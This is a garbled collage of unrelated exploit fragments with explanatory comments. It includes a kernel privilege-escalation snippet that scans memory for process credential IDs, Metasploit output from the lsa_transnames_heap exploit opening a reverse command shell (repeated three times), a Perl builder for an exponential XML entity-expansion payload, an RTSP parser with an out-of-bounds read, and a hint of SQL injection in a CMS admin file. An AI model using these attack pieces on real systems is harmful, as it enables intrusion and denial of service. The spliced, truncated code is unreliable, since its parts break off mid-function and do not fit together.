}
/**
 * Collects the distinct values that follow the marker "index.php?topic=" in $_h.
 *
 * The hex-escaped literal below decodes to `index.php?topic=` and "\x22" is a
 * double quote, so each captured value is the text between the marker and the
 * next `"`. Hex-escaping plain ASCII hides a string from simple text searches;
 * decoding such literals is the first step when triaging a script like this.
 *
 * Only the start of the function is visible in this excerpt: the closing brace
 * and whatever is done with $_y afterwards are not shown.
 *
 * @param string $_h Text to scan (presumably a fetched HTML page; confirm against the caller).
 */
function xtrct_tpc($_h){
// Split on the marker; element 0 is the text before the first occurrence.
$_x=explode("\x69\x6e\x64\x65\x78\x2e\x70\x68\x70\x3f\x74\x6f\x70\x69\x63\x3d",$_h);
$_y=array();
// Start at 1 so that only the pieces that follow a marker are examined.
for ($i=1; $i<count($_x); $i++){
// Keep everything up to the first double quote after the marker.
$_tmp=explode("\x22",$_x[$i]);
// Skip empty captures and values already stored; in_array() is called without
// its strict flag, so the duplicate check uses loose comparison.
if ((!in_array($_tmp[0],$_y)) and ($_tmp[0]<>'')) {
// Stored under the loop index, so the keys of $_y are not contiguous.
$_y[$i]=$_tmp[0];
}
}
/* Fragment of a request-line parser. The parts marked "..." and the
 * declarations of i, reqStr, reqStrSize and resultCmdNameMaxSize are not shown. */
// The bound keeps i below resultCmdNameMaxSize-1 and below reqStrSize.
for (i = 0; i < resultCmdNameMaxSize-1 && i < reqStrSize; ++i) {
...
// Skip over the prefix of any "rtsp://" or "rtsp:/" URL that follows:
unsigned j = i+1;
// Advance j past spaces and tabs; j < reqStrSize is tested before reqStr[j] is read.
while (j < reqStrSize && (reqStr[j] == ' ' || reqStr[j] == '\t')) ++j;
// This loop restarts j at i+1, so the position reached by the whitespace skip
// above is not used.
// NOTE(review): if reqStrSize is an unsigned type (its declaration is not shown)
// and the request is shorter than 8 bytes, reqStrSize-8 wraps to a very large
// value and the bound no longer limits j, allowing reads past the end of reqStr.
// Checking reqStrSize >= 8 first, or comparing j+8 < reqStrSize, avoids the wrap.
for (j = i+1; j < reqStrSize-8; ++j) {
...
// Fragment: the excerpt stops right after the if condition, and i, uid, euid
// and suid are declared outside it.
uint8_t *gs;
uint32_t *ptr;
// Load the 64-bit value stored at offset 0 of the GS segment into gs.
asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs));
// Use that value as a base address and test every byte offset from 200 to 999;
// the step is one byte, so most of the 32-bit reads below are unaligned.
for (i = 200; i < 1000; i+=1) {
ptr = (uint32_t*) (gs + i);
// Match four consecutive 32-bit words equal to uid, euid, suid and uid again.
// NOTE(review): presumably this finds the process's ID fields inside a kernel
// structure by value pattern instead of a fixed offset; confirm against the
// full listing. The match depends on the IDs being stored inline as adjacent
// 32-bit words in the scanned structure.
if ((ptr[0] == uid) && (ptr[1] == euid)
&& (ptr[2] == suid) && (ptr[3] == uid)) {
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...
uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
GNU/Linux
print "No PROPFIND on this server and path.\n";
exit(0);
}
# Accumulates XML entity declarations in $a, one line per entity.
$a = "";
# Each pass declares entity x$i as two references to x($i-1), so the expanded
# size doubles with every level (exponential entity expansion). x0 is referenced
# by the first pass but not declared here; presumably it is defined in the part
# of the script that is not shown. Parsers that cap entity expansion, or refuse
# DTDs in untrusted input, reject a document built this way.
for ($i=1;$i<256;$i++) { # the loop bound sets how many nested entity levels are declared
$k = $i-1;
$a .= "<!ENTITY x$i \"&x$k;&x$k;\">\n"
}
$igzml =
#Path --> [HOME_PATH]/modules/body_mods/admin_panel/settings.php
#
#Its contents:
# ...
#
# if( $i>1 ){
# $order.= ' `page` = "'.$admin_pages[$i].'",';
# }
# ...
#
# $allPages_select = 'SELECT * FROM `pagedata`
12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 1 opened (192.168.50.201:33694 ->
192.168.50.10:4444)
msf exploit(lsa_transnames_heap) > sessions -i 1
[*] Starting interaction with 1...
uname -a
Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
GNU/Linux
> 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ...
> [*] Calling the vulnerable function...
> [+] Server did not respond, this is expected
> [*] Command shell session 1 opened (192.168.50.201:33694 ->
> 192.168.50.10:4444)
> msf exploit(lsa_transnames_heap) > sessions -i 1
> [*] Starting interaction with 1...
>
> uname -a
> Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686
> GNU/Linux